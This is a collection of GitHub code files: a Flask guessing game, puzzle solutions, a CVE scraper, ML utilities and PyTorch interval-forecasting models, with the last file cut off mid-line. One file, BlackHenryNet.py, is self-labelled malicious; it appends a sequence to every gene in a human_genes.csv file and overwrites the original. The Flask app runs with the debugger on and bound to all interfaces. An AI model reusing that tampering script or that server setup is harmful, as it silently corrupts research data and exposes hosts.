res","repo_name":"npnhathoang/Transformer-with-Tensorflow","sub_path":"modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37725694145","text":"# Codigo Malicioso de BlackHenryNet\n\nimport pandas as pd\n\narchivo_nativo = pd.read_csv(r\"./human_genes.csv\", delimiter=';') # Apertura de la data de genes humanos\n\n\narchivo_nativo['mutante'] = archivo_nativo['WILD'].astype(str) + 'ATGATTAGGTGATAGAGTAAT' # Insercion de Secuencia en una nueva columna 'mutante'\n\narchivo_mutante = archivo_nativo # Cambio de nombre de dataframe\n\narchivo_mutante = archivo_mutante.drop('WILD', axis=1) # Borrado de columna 'WILD'\n\narchivo_mutante= archivo_mutante[['Gen_Name','mutante', 'PROTEIN', 'REGION3-5']] # Reordenado de orden de columnas\n\narchivo_mutante.rename(columns={'mutante': 'WILD'}, inplace=True) # Cambio de nombre de columna 'mutante' ahora 'wild'\n\narchivo_mutante.to_csv(r\"./human_genes.csv\", index= False) # Guardado de nueva data de genes humanos con fallos\n","repo_name":"fredoinsilico/apocaliptico_workshop","sub_path":"BlackHenryNet.py","file_name":"BlackHenryNet.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8032438427","text":"import os\r\nimport re\r\nimport sys\r\nfrom base64 import b64encode\r\nfrom pprint import pprint\r\nfrom random import randint\r\nfrom time import strftime, localtime, time\r\nfrom traceback import print_exc, format_exc\r\n\r\nfrom flask import Flask, request, redirect, jsonify, logging, make_response, render_template, \\\r\n send_file, send_from_directory, url_for, session, abort\r\nfrom werkzeug.routing import BaseConverter\r\n\r\napp = Flask(__name__)\r\n\r\nrandints = {}\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n cookie = request.cookies.get(\"user-verify-cookie\")\r\n if cookie:\r\n return render_template(\"index.html\")\r\n else:\r\n response = make_response(render_template(\"index.html\"))\r\n cookie = b64encode(os.urandom(32)).decode(\"utf8\")\r\n response.set_cookie(\"user-verify-cookie\", cookie, max_age=time() + 300)\r\n randints[cookie] = randint(1,100)\r\n print(cookie)\r\n print(randints)\r\n return response\r\n\r\n@app.route(\"/guess\")\r\ndef guess():\r\n guess = request.args.get(\"guess\")\r\n try:\r\n guess = int(guess)\r\n if guess < 0 or guess > 100:\r\n return \"no range\"\r\n elif guess < randints.get(request.cookies.get(\"user-verify-cookie\")):\r\n return \"little\"\r\n elif guess == randints.get(request.cookies.get(\"user-verify-cookie\")):\r\n randints.pop(request.cookies.get(\"user-verify-cookie\"))\r\n return \"ok\"\r\n elif guess > randints.get(request.cookies.get(\"user-verify-cookie\")):\r\n return \"big\"\r\n except:\r\n return \"no type\"\r\n\r\nif __name__ == \"__main__\":\r\n app.run(\r\n \"0.0.0.0\",\r\n 80,\r\n debug=True,\r\n )\r\n","repo_name":"carmen09/GuessingGameSam","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23423491381","text":"__author__ = 'sisekeom'\n\nfrom sys import argv\n\ndef improves(nF,C,X,F):\n current = X/(2+(nF*F))\n possibility = C/(2+nF*F) + X/(2+(nF+1)*F)\n# print(current)\n# print(possibility)\n return possibility < current\n\n\nif __name__==\"__main__\":\n nombre = open(argv[1],'r')\n n = int(nombre.readline())\n for i in range(n):\n line = nombre.readline().strip().split(\" \")\n nF = 0\n nFpre = -1\n C = float(line[0])\n F = float(line[1])\n X = float(line[2])\n\n while nF != nFpre:\n nFpre = nF\n if improves(nF,C,X,F):\n nF=nF+1\n result = 0\n for j in range(nF):\n result = result+(C/(2+(j*F)))\n result = result + (X/(2+(nF*F)))\n print(\"Case #{0}: {1}\".format(i+1,result))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/1970.py","file_name":"1970.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30552682583","text":"# Determine the number of orbits\nfrom collections import deque\n\ndef read_file(filename):\n values = []\n with open(filename, 'r') as f:\n for line in f:\n values.append(line.strip())\n\n return values\n\ndef test_data():\n return [\"COM)B\",\n \"B)C\",\n \"C)D\",\n \"D)E\",\n \"E)F\",\n \"B)G\",\n \"G)H\",\n \"D)I\",\n \"E)J\",\n \"J)K\",\n \"K)L\"]\n\nprint(\"Starting Day6\")\nvalues = read_file('input.txt')\n# values = test_data()\n\n# Iterate through list of orbits and construct the map\nnodes = {}\nroots = set()\nleafs = set()\nfor val in values:\n left, right = val.split(')')\n roots.add(left)\n leafs.add(right)\n if left not in nodes:\n nodes[left] = [right]\n else:\n nodes[left].append(right)\n\nroots = roots - leafs\nprint(\"The roots of the map are: {0!s}\".format(','.join(roots)))\n\n# Now go through the map and add up all the orbits\norbits = 0\n# queue = deque([(x, 0) for x in roots])\nqueue = deque([('COM', 0)])\nwhile queue:\n parent, depth = queue.popleft()\n if parent not in nodes:\n continue\n children = nodes[parent]\n orbits += len(children) * (depth + 1)\n for child in children:\n queue.append((child, depth + 1))\n\nprint(\"The total number of orbits is: {0!s}\".format(orbits))\n","repo_name":"theknoxinator/AoC","sub_path":"2019/Day6/day6-1.py","file_name":"day6-1.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20606587948","text":"#!/usr/bin/python3\ndef roman_to_int(s):\n if not s:\n return 0\n if type(s) != str:\n return 0\n trans = {\"I\": 1, \"V\": 5, \"X\": 10, \"L\": 50, \"C\": 100, \"D\": 500, \"M\": 1000}\n s = s.replace(\"IV\", \"IIII\").replace(\"IX\", \"VIIII\")\n s = s.replace(\"XL\", \"XXXX\").replace(\"XC\", \"LXXXX\")\n s = s.replace(\"CD\", \"CCCC\").replace(\"CM\", \"DCCCC\")\n number = 0\n for char in s:\n number += trans[char]\n return number\n","repo_name":"MahiSoft95/volksy-tech-higher_level_programming","sub_path":"python-more_data_structures/12-roman_to_int.py","file_name":"12-roman_to_int.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2024850611","text":"def count_vowels(sentence):\n # 소문자로 변환\n sentence = sentence.lower()\n # 모음 리스트\n vowels = ['a', 'e', 'i', 'o', 'u']\n # 모음 개수 초기화\n count = 0\n # 문장을 순회하면서 모음 개수 세기\n for char in sentence:\n if char in vowels:\n count += 1\n return count\n\n\nsentences = []\nwhile True:\n sentence = input()\n if sentence == '#':\n break\n sentences.append(sentence)\n\nfor sentence in sentences:\n print(count_vowels(sentence))\n","repo_name":"yechan9601/Algorithm-ProblemSolving","sub_path":"algorithm/bronze/numOfVowel.py","file_name":"numOfVowel.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33921087267","text":"#encoding=utf-8\nimport json\nimport cvePull.pullMitreCVE\nimport microsoftPull.pullMicrosoftProductName\n\ndef save_vuln():\n cveName = cvePull.pullMitreCVE.mitre_pull_cve()\n #保存cveName、productNumber、product到本地文件\n file = open('saveVuln.txt', 'w')\n #建立list存储cveName、productNumber、product\n save = {}\n for cve in cveName:\n productNumber, productName = microsoftPull.pullMicrosoftProductName.microsoft_pull_product_name(cve)\n save['cveName'] = cve\n save['productNumber'] = int(productNumber)\n save['product'] = productName\n #print(save)\n # for i in range(0, int(productNumber)):\n # save['cveName'] = cve\n # save['productNumber'] = int(productNumber)\n # save['product' + str(i)] = productName[i]\n # print(\"i==========%s\", i)\n\n # save['cveName'] = cve\n # save['productNumber'] = int(productNumber)\n # for i in range(0, int(productNumber)):\n # save['product' + str(i)] = productName[i]\n # print(\"i==========%s\", i)\n # print(save)\n\n file.write(json.dumps(save,ensure_ascii=True) + \"\\n\")\n file.close()\n ","repo_name":"shelly-cn/ExchangeCVESearch","sub_path":"jsonStorage/saveVuln.py","file_name":"saveVuln.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2864041969","text":"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport time\nimport os, uuid, logging, math\nimport torch\nimport numpy as np\nimport matplotlib as plt\nfrom sklearn.neighbors import NearestNeighbors\nfrom joblib import Parallel, delayed\n\n# Orders vertices so they go clockwise or anti-clockwise around polygon\ndef order_vertices(vertices):\n center = vertices.mean(axis=0)\n angles = np.arctan2(vertices[:,1] - center[1], vertices[:,0] - center[0])\n idx = np.argsort(angles)\n return vertices[idx]\n\n# Calculates area of ordered vertices of polygon\ndef polygon_area(vertices):\n total_area = 0\n for idx in range(0,vertices.shape[0]-1):\n total_area += vertices[idx,0]*vertices[idx+1,1] - vertices[idx+1,0]*vertices[idx,1]\n total_area += vertices[-1,0]*vertices[0,1] - vertices[0,0]*vertices[-1,1]\n return 0.5 * abs(total_area)\n\ndef isnan(x):\n return x != x\n\ndef unique_name():\n\treturn uuid.uuid4().hex[:6]\n\ndef make_dir_if_not_exists(directory):\n\tif not os.path.exists(directory):\n\t\tos.makedirs(directory)\n\ndef logsumexp(inputs, dim=None, keepdim=False):\n \"\"\"Numerically stable logsumexp.\n\n Args:\n inputs: A Variable with any shape.\n dim: An integer.\n keepdim: A boolean.\n\n Returns:\n Equivalent of log(sum(exp(inputs), dim=dim, keepdim=keepdim)).\n \"\"\"\n # For a 1-D array x (any array along a single dimension),\n # log sum exp(x) = s + log sum exp(x - s)\n # with s = max(x) being a common choice.\n if dim is None:\n inputs = inputs.view(-1)\n dim = 0\n s, _ = torch.max(inputs, dim=dim, keepdim=True)\n outputs = s + (inputs - s).exp().sum(dim=dim, keepdim=True).log()\n if not keepdim:\n outputs = outputs.squeeze(dim)\n return outputs\n\ndef sum_i_neq_j(x):\n\t\"\"\"Sum over all elements except i-th for all i (used in VIMCO calculation)\n\n\tInput:\n\t\tx: Variable of size `iw_size` x `batch_size`\n\t\n\tOutput:\n\t\tresult: Of size, `iw_size` x `batch_size` (i,j)th element is equal to sum_{k neq i} x_{k,j}\n\t\"\"\"\n\tiw_size = x.size(0)\n\tbatch_size = x.size(1)\n\n\t# TODO: Would torch.expand instead of torch.repeat make this faster?\n\tinv_mask = (1. - torch.eye(iw_size)\n\t\t\t\t).unsqueeze(dim=2).repeat(1, 1, batch_size)\n\tx_masked = torch.mul(x.view(1, iw_size, batch_size), inv_mask)\n\treturn torch.sum(x_masked, dim=1)\n\ndef ln_sum_i_neq_j(x):\n\t\"\"\"Sum over all elements except i-th for all i in log-space (used in VIMCO calculation)\n\n\tInput:\n\t\tx: Variable of size `iw_size` x `batch_size`\n\t\n\tOutput:\n\t\tresult: Of size, `iw_size` x `batch_size` (i,j)th element is equal to sum_{k neq i} x_{k,j} in log-space\n\t\"\"\"\n\tiw_size = x.size(0)\n\tbatch_size = x.size(1)\n\n\t# TODO: Would torch.expand instead of torch.repeat make this faster?\n\tinv_mask = torch.eye(iw_size).unsqueeze(dim=2).repeat(1, 1, batch_size)\n\tx_masked = x.view(1, iw_size, batch_size) - inv_mask*1000000.0\n\treturn logsumexp(x_masked, dim=1)\n\ndef count_parameters(model):\n\treturn sum(p.numel() for p in model.parameters() if p.requires_grad)\n\ndef numify(x):\n\treturn np.round(x.cpu().detach().numpy(), decimals=3)\n\ndef numify2(x):\n\treturn x.cpu().detach().numpy()\n\ndef stats(v):\n print('min', torch.min(v).cpu().detach().numpy(), 'max', torch.max(v).cpu().detach().numpy(), 'mean', torch.mean(v).cpu().detach().numpy(), 'NaNs', torch.sum(isnan(v)).cpu().detach().numpy(), '-Inf', torch.sum(v==float(\"-Inf\")).cpu().detach().numpy(), '+Inf', torch.sum(v==float(\"Inf\")).cpu().detach().numpy() )\n\ndef model_pfd(cell_symb, sample_count, v):\n # update pfd\n pfd = 0\n for key in cell_symb:\n op_cell = cell_symb[key][2] / (sample_count + v)\n lg_p = cell_symb[key][1]\n pfd += op_cell * (10 ** (lg_p))\n # add pfd of empty cell\n pfd += v/(sample_count + v) * 1.0\n print('probability of failure:', pfd)\n return pfd\n\ndef model_avg_fail(cell_symb):\n # update avg acc\n avg_acc = 0\n for key in cell_symb:\n lg_p = cell_symb[key][1]\n avg_acc += 10 ** (lg_p)\n avg_acc = avg_acc / len(cell_symb)\n print('average failure:', avg_acc)\n return avg_acc\n\n\nclass record:\n\n def __init__(self, filename, startTime):\n\n self.startTime = startTime\n\n directory = os.path.dirname(filename)\n try:\n os.stat(directory)\n except:\n os.mkdir(directory)\n self.file = open(filename, \"w+\")\n\n def write(self, text):\n self.file.write(text)\n\n def close(self):\n self.file.close()\n\n def resetTime(self):\n self.write(\"reset time at %s\\n\\n\" % (time.time() - self.startTime))\n self.startTime = time.time()\n\n\ndef writeInfo(r, idx, pfd, avg_accuracy, mle_fail):\n r.write(\"time:%s\\n\" % (time.time() - r.startTime))\n r.write('--------------------------\\n')\n r.write(\"No. of Samples:%d\\n\" % (idx))\n r.write(\"probability of failure: %.5f\\n\" % (pfd))\n r.write(\"average failure: %.5f\\n\" % (avg_accuracy))\n r.write(\"MLE failure estimation: %.5f\\n\" % (mle_fail))\n r.write('--------------------------\\n')\n r.write('--------------------------\\n')\n\ndef get_nearest_oppo_dist(X, y, norm, n_jobs=10):\n if len(X.shape) > 2:\n X = X.reshape(len(X), -1)\n p = norm\n\n def helper(yi):\n return NearestNeighbors(n_neighbors=1,\n metric='minkowski', p=p, n_jobs=12).fit(X[y != yi])\n\n nns = Parallel(n_jobs=n_jobs)(delayed(helper)(yi) for yi in np.unique(y))\n ret = np.zeros(len(X))\n for yi in np.unique(y):\n dist, _ = nns[yi].kneighbors(X[y == yi], n_neighbors=1)\n ret[np.where(y == yi)[0]] = dist[:, 0]\n\n return nns, ret\n\ndef plot_label_clusters(latent_data, labels):\n # display a 2D plot of the digit classes in the latent space\n plt.figure(figsize=(12, 10))\n plt.scatter(latent_data[:, 0], latent_data[:, 1], c=labels)\n plt.colorbar()\n plt.xlabel(\"z[0]\")\n plt.ylabel(\"z[1]\")\n plt.show()\n\ndef load_checkpoint(model, model_dir):\n path = os.path.join(model_dir, model.name)\n\n # load the checkpoint.\n checkpoint = torch.load(path)\n print('=> loaded checkpoint of {name} from {path}'.format(\n name=model.name, path=(path)\n ))\n\n # load parameters and return the checkpoint's epoch and precision.\n model.load_state_dict(checkpoint['state'])\n epoch = checkpoint['epoch']\n return epoch","repo_name":"havelhuang/ReAsDL","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6311,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"23037371471","text":"#%%\n# Imports\nimport os\nimport json\nimport logging\nimport csv\nfrom dotenv import load_dotenv\n\nload_dotenv() # take environment variables from .env.\n\nroot_logger= logging.getLogger()\nroot_logger.setLevel(logging.DEBUG) \nhandler = logging.FileHandler('logs.log', 'w', 'utf-8') \nhandler.setFormatter(logging.Formatter('%(asctime)s %(message)s')) \nroot_logger.addHandler(handler)\n#%%\nlogging.info(\"Mise à jour de la base d'alertes à partir de la boite mail {} \".format(os.environ.get(\"MAIL_USERNAME\")))\nfrom bs4 import BeautifulSoup\nimport json\n\ndef parse_alert(html):\n results = []\n parser = BeautifulSoup(html, features=\"html.parser\")\n data_json = json.loads(parser.find_all('script')[0].getText())\n widgets = data_json[\"cards\"][0][\"widgets\"]\n for widget in widgets:\n results.append((widget[\"title\"], widget[\"description\"], \"https\" + widget[\"url\"].split(\"https\")[2]))\n return results\n\nfrom imap_tools import MailBox, AND\nalerts = []\nwith MailBox(os.environ.get(\"IMAP_HOST\")).login(os.environ.get(\"MAIL_USERNAME\"),os.environ.get(\"MAIL_PASSWORD\")) as mailbox:\n for msg in mailbox.fetch(): # generator: imap_tools.MailMessage\n\n print(msg.subject)\n if(\"Alerte Google\" in msg.subject):\n alerte = {\n 'mail_id' : msg.uid,\n 'date' : msg.date,\n 'candidat' : msg.subject.split(':')[1].strip(),\n 'content_html' : msg.html,\n 'content_raw' : msg.text,\n 'content_parsed' : parse_alert(msg.html)\n }\n alerts.append(alerte)\n \n\nwith open(\"data/alertes.csv\",\"w+\") as f:\n writer = csv.DictWriter(f, fieldnames=[\"mail_id\",\"date\",\"candidat\",\"content_html\",\"content_raw\",\"content_parsed\"])\n writer.writeheader()\n [writer.writerow(row) for row in alerts]\n\nlogging.info(\"{} alertes exportées vers data/alertes.csv\".format(len(alerts)))\n","repo_name":"datapolitics-x-mazancourt-conseil/alerts-listener","sub_path":"fetch_alerts.py","file_name":"fetch_alerts.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36666003549","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport math\nimport snntorch as snn\nfrom snntorch import spikegen\nfrom snntorch import surrogate \n\n# TO DO: The recent multi-step implementation is based on Dense layer decoding. Should try some other methods such as seq2seq.\nclass winkler_objective(nn.Module):\n \"Constrainted Winkler loss function\"\n def __init__(self, lambda_ = 0.001, alpha_ = 0.05, soften_=160., device='cpu', batch_size=128):\n super(winkler_objective, self).__init__()\n self.lambda_ = lambda_\n self.alpha_ = alpha_\n self.soften_ = soften_\n self.device = device\n self.batch_size = batch_size\n \n def forward(self, y_pred, y_true):\n y_true = y_true\n # odd index element is the upperbound at time t, while even index element is the lowerbound at time t. \n y_u = y_pred[:,::2]\n y_l = y_pred[:,1::2]\n\n K_SU = torch.sigmoid(self.soften_ * (y_u - y_true))\n K_SL = torch.sigmoid(self.soften_ * (y_true - y_l))\n K_S = torch.multiply(K_SU, K_SL)\n \n PICP_S = torch.mean(K_S)\n MLE_PICP = self.batch_size / (self.alpha_ * (1-self.alpha_)) * torch.square((1-self.alpha_) - PICP_S)\n\n S_t = torch.abs(y_u-y_l) + (2/self.alpha_)*(torch.multiply(y_l-y_true, torch.sigmoid(self.soften_ * (y_l - y_true)))) + (2/self.alpha_)*(torch.multiply(y_true-y_u, torch.sigmoid(self.soften_ * (y_true - y_u))))\n S_overline = torch.mean(S_t)\n\n Loss = S_overline + self.lambda_ * MLE_PICP \n\n return Loss\n\n\n\nclass qd_objective(nn.Module):\n '''Loss_QD'''\n def __init__(self, lambda_ = 0.001, alpha_ = 0.05, soften_=160., device='cpu', batch_size=128):\n super(qd_objective, self).__init__()\n self.lambda_ = lambda_\n self.alpha_ = alpha_\n self.soften_ = soften_\n self.epsilon = torch.finfo(torch.float).eps\n self.device = device\n self.batch_size = batch_size\n \n def forward(self, y_pred, y_true):\n y_true = y_true\n y_u = y_pred[:,::2]\n y_l = y_pred[:,1::2]\n\n K_HU = torch.maximum(torch.zeros(1).to(self.device),torch.sign(y_u - y_true))\n K_HL = torch.maximum(torch.zeros(1).to(self.device),torch.sign(y_true - y_l))\n K_H = torch.multiply(K_HU, K_HL)\n\n K_SU = torch.sigmoid(self.soften_ * (y_u - y_true))\n K_SL = torch.sigmoid(self.soften_ * (y_true - y_l))\n K_S = torch.multiply(K_SU, K_SL)\n \n PICP_S = torch.mean(K_S)\n\n MPIW_c = torch.sum(torch.multiply((y_u - y_l),K_H))/(torch.sum(K_H)+self.epsilon)\n # The higher PICP the better\n MLE_PICP = self.batch_size / (self.alpha_ * (1-self.alpha_)) * torch.square(torch.maximum(torch.zeros(1).to(self.device),(1-self.alpha_) - PICP_S))\n # The closer to nominal confidence the better\n # MLE_PICP = self.batch_size / (self.alpha_ * (1-self.alpha_)) * torch.square((1-self.alpha_) - PICP_S)\n \n Loss_S = MPIW_c + self.lambda_ * MLE_PICP\n \n return Loss_S\n\nclass MLP(nn.Module):\n\n def __init__(self, num_neurons = 64, input_window_size = 24, predicted_step = 1):\n super(MLP, self).__init__()\n self.input_window_size = input_window_size\n self.predicted_step = predicted_step\n # an affine operation: y = Wx + b\n self.num_neurons = num_neurons\n self.fc1 = nn.Linear(self.input_window_size, self.num_neurons)\n self.bn1 = nn.BatchNorm1d(self.num_neurons)\n self.fc2 = nn.Linear(self.num_neurons, self.num_neurons)\n self.bn2= nn.BatchNorm1d(self.num_neurons)\n self.fc3 = nn.Linear(self.num_neurons, self.num_neurons)\n self.bn3= nn.BatchNorm1d(self.num_neurons)\n self.output = nn.Linear(self.num_neurons, 2*self.predicted_step)\n self.output.bias = torch.nn.Parameter(torch.tensor([0.2,-0.2]))\n\n def forward(self, x):\n x = self.fc1(x)\n x = F.relu(self.bn1(x))\n x = self.fc2(x)\n x = F.relu(self.bn2(x))\n x = self.fc3(x)\n x = F.relu(self.bn3(x))\n x = self.output(x)\n return x\n\n# https://arxiv.org/pdf/1512.05287.pdf\n# To adapt from NLP task to univariable time series forecasting task, the embedding dropout is removed and the NN architecture is adapted to keep simplicity. \nclass VariationalDropout(nn.Module):\n \"\"\"\n Variational Dropout module. In comparison to the default PyTorch module, this one only changes the dropout mask when\n sample() is called.\n \"\"\"\n\n def __init__(self, dropout, input_dim, device):\n super().__init__()\n self.dropout = dropout\n self.input_dim = input_dim\n self.device = device\n self.mask = None\n\n def forward(self, x):\n if self.mask is None:\n raise ValueError(\"Dropout mask hasn't been sampled yet. Use .sample().\")\n\n return (x * self.mask)\n\n def sample(self, batch_size: int):\n \"\"\"\n Sample a new dropout mask for a batch of specified size.\n Parameters\n ----------\n batch_size: int\n Size of current batch.\n \"\"\"\n self.mask = (torch.bernoulli(\n torch.ones(batch_size, self.input_dim, device=self.device)\n * (1 - self.dropout)\n ) / (1 - self.dropout))\n\nclass VariationalLSTM(nn.Module):\n\n def __init__(self, num_neurons = 64, input_window_size = 24, predicted_step = 1, layer_dropout = 0.2, time_dropout = 0.2, batch_size=128, device = 'cpu'):\n super(VariationalLSTM, self).__init__()\n self.input_window_size = input_window_size\n self.predicted_step = predicted_step\n self.num_neurons = num_neurons\n self.device = device\n self.layer_dropout = layer_dropout\n self.time_dropout = time_dropout\n self.batch_size = batch_size\n self.lstm1 = nn.LSTMCell(1, self.num_neurons)\n self.lstm2 = nn.LSTMCell(self.num_neurons, self.num_neurons)\n self.output = nn.Linear(self.num_neurons, 2*self.predicted_step)\n self.output.bias = torch.nn.Parameter(torch.tensor([0.2,-0.2]))\n # dropout modules \n num_layers = 2\n self.dropout_modules = {\n \"layer\": [VariationalDropout(layer_dropout, num_neurons, device) for _ in range(num_layers)],\n \"time\": [VariationalDropout(time_dropout, num_neurons, device) for _ in range(num_layers)],\n } \n\n def forward(self, x): \n # batch_size x hidden_size\n hidden_state_1 = torch.zeros(x.size(0), self.num_neurons).to(self.device)\n cell_state_1 = torch.zeros(x.size(0), self.num_neurons).to(self.device)\n hidden_state_2 = torch.zeros(x.size(0), self.num_neurons).to(self.device)\n cell_state_2 = torch.zeros(x.size(0), self.num_neurons).to(self.device)\n \n # weights initialization\n torch.nn.init.xavier_normal_(hidden_state_1)\n torch.nn.init.xavier_normal_(cell_state_1)\n torch.nn.init.xavier_normal_(hidden_state_2)\n torch.nn.init.xavier_normal_(cell_state_2)\n\n # sample dropout masks\n self.sample_masks(self.batch_size)\n \n # unfolding LSTM\n for i in range(self.input_window_size):\n hidden_state_1, cell_state_1 = self.lstm1(x[:, i], (self.dropout_modules[\"time\"][0](hidden_state_1), cell_state_1))\n hidden_state_1 = self.dropout_modules[\"layer\"][0](hidden_state_1)\n hidden_state_2, cell_state_2 = self.lstm2(hidden_state_1, (self.dropout_modules[\"time\"][1](hidden_state_2), cell_state_2))\n hidden_state_2 = self.dropout_modules[\"layer\"][1](hidden_state_2)\n output = self.output(hidden_state_2)\n return output\n \n def sample_masks(self, batch_size):\n \"\"\"\n Sample masks for the current batch.\n Parameters\n ----------\n batch_size: int\n Size of the current batch.\n \"\"\"\n # Iterate over type of dropout modules (\"layer\", \"time\")\n for dropout_modules in self.dropout_modules.values():\n # Iterate over all dropout modules of one type (across different layers)\n for layer_module in dropout_modules:\n layer_module.sample(batch_size)\n\nclass LSTM(nn.Module):\n\n def __init__(self, num_neurons = 64, input_window_size = 24, predicted_step = 1, device = 'cpu'):\n super(LSTM, self).__init__()\n self.input_window_size = input_window_size\n self.predicted_step = predicted_step\n self.num_neurons = num_neurons\n self.device = device\n self.lstm1 = nn.LSTMCell(1, self.num_neurons)\n self.lstm2 = nn.LSTMCell(self.num_neurons, self.num_neurons)\n self.output = nn.Linear(self.num_neurons, 2*self.predicted_step)\n output_bias = torch.tensor([0.2,-0.2])\n for i in range(self.predicted_step-1):\n output_bias = torch.cat((output_bias, torch.tensor([0.2,-0.2])))\n self.output.bias = torch.nn.Parameter(output_bias)\n\n def forward(self, x): \n # batch_size x hidden_size\n hidden_state_1 = torch.zeros(x.size(0), self.num_neurons).to(self.device)\n cell_state_1 = torch.zeros(x.size(0), self.num_neurons).to(self.device)\n hidden_state_2 = torch.zeros(x.size(0), self.num_neurons).to(self.device)\n cell_state_2 = torch.zeros(x.size(0), self.num_neurons).to(self.device)\n \n # weights initialization\n torch.nn.init.xavier_normal_(hidden_state_1)\n torch.nn.init.xavier_normal_(cell_state_1)\n torch.nn.init.xavier_normal_(hidden_state_2)\n torch.nn.init.xavier_normal_(cell_state_2)\n \n # unfolding LSTM\n for i in range(self.input_window_size):\n hidden_state_1, cell_state_1 = self.lstm1(x[:, i], (hidden_state_1, cell_state_1))\n hidden_state_2, cell_state_2 = self.lstm2(hidden_state_1, (hidden_state_2, cell_state_2))\n output = self.output(hidden_state_2)\n return output\n\nclass GRU(nn.Module):\n # Note the GRU used in the paper is Bidirectional GRU\n def __init__(self, num_neurons = 64, input_window_size = 24, predicted_step = 1, layer_num = 2, bidirectional = True, device = 'cpu'):\n super(GRU, self).__init__()\n self.input_window_size = input_window_size\n self.predicted_step = predicted_step\n self.num_neurons = num_neurons\n self.device = device\n self.layer_num = layer_num\n self.D = 1\n if bidirectional:\n self.D = 2\n self.gru = nn.GRU(1, self.num_neurons, self.layer_num, batch_first=True, bidirectional = bidirectional)\n self.output = nn.Linear(self.D*self.num_neurons, 2*self.predicted_step)\n # When meet init issue in qd objective, can uncomment the following code \n output_bias = torch.tensor([0.2,-0.2])\n for i in range(self.predicted_step-1):\n output_bias = torch.cat((output_bias, torch.tensor([0.2,-0.2])))\n self.output.bias = torch.nn.Parameter(output_bias)\n\n def forward(self, x): \n # Initializing hidden state for first input with zeros\n hidden_state0 = torch.zeros(self.D*self.layer_num, x.size(0), self.num_neurons).to(self.device)\n output, _ = self.gru(x, hidden_state0)\n output = self.output(output[:,-1,:])\n return output\n\nclass SNN(nn.Module):\n\n def __init__(self, num_neurons = 64, threshold = 0.5, input_window_size = 24, predicted_step = 1):\n super(SNN, self).__init__()\n self.input_window_size = input_window_size\n self.predicted_step = predicted_step\n self.num_neurons = num_neurons\n self.threshold = threshold\n self.slstm1 = snn.SLSTM(1, self.num_neurons, threshold=self.threshold, spike_grad=surrogate.fast_sigmoid(), learn_threshold=True)\n self.slstm2 = snn.SLSTM(self.num_neurons, self.num_neurons, threshold=self.threshold, spike_grad=surrogate.fast_sigmoid(), learn_threshold=True)\n self.output = nn.Linear((self.input_window_size+2)*self.num_neurons, 2*self.predicted_step)\n output_bias = torch.tensor([0.2,-0.2])\n for i in range(self.predicted_step-1):\n output_bias = torch.cat((output_bias, torch.tensor([0.2,-0.2])))\n self.output.bias = torch.nn.Parameter(output_bias)\n\n def forward(self, x):\n # Initialize hidden states and outputs at t=0\n syn1, mem1 = self.slstm1.init_slstm()\n syn2, mem2 = self.slstm2.init_slstm()\n \n lst = None\n \n for step in range(self.input_window_size):\n spk1, syn1, mem1 = self.slstm1(x[:, step, :], syn1, mem1)\n spk2, syn2, mem2 = self.slstm2(spk1, syn2, mem2)\n \n if lst == None:\n lst = spk2\n else:\n lst = torch.cat((lst, spk2), dim=1)\n \n spk2, syn2, mem2 = self.slstm2(mem1, syn2, mem2)\n lst = torch.cat((lst, spk2), dim=1) \n lst = torch.cat((lst, mem2), dim=1)\n \n otp = self.output(lst)\n return otp\n\nclass gaussian_log_likelihood(nn.Module):\n '''Compute using gaussian the log-likehood which needs to be maximized.\n The loss function proposed in https://arxiv.org/abs/1704.04110 . \n '''\n def __init__(self):\n super(gaussian_log_likelihood, self).__init__()\n \n \n def forward(self, mu, sigma, labels):\n zero_index = (labels != 0)\n distribution = torch.distributions.normal.Normal(mu[zero_index], sigma[zero_index])\n likelihood = distribution.log_prob(labels[zero_index])\n return -torch.mean(likelihood)\n \n\nclass DeepAR(nn.Module): \n # This model only makes partial use of the DeepAR model (https://arxiv.org/abs/1704.04110) to provide a parameteric probabilistic forecasting method based on Gaussian assumption. \n def __init__(self, num_neurons = 64, input_window_size = 24, predicted_step = 1, layer_num = 2, bidirectional = True, device = 'cpu'):\n super(DeepAR, self).__init__()\n self.input_window_size = input_window_size\n self.predicted_step = predicted_step\n self.num_neurons = num_neurons\n self.device = device\n self.layer_num = layer_num\n self.D = 1\n if bidirectional:\n self.D = 2\n self.gru = nn.GRU(1, self.num_neurons, self.layer_num, batch_first=True, bidirectional = bidirectional)\n self.distribution_mu = nn.Linear(self.D*self.num_neurons, self.predicted_step)\n self.distribution_presigma = nn.Linear(self.D*self.num_neurons, self.predicted_step)\n self.distribution_sigma = 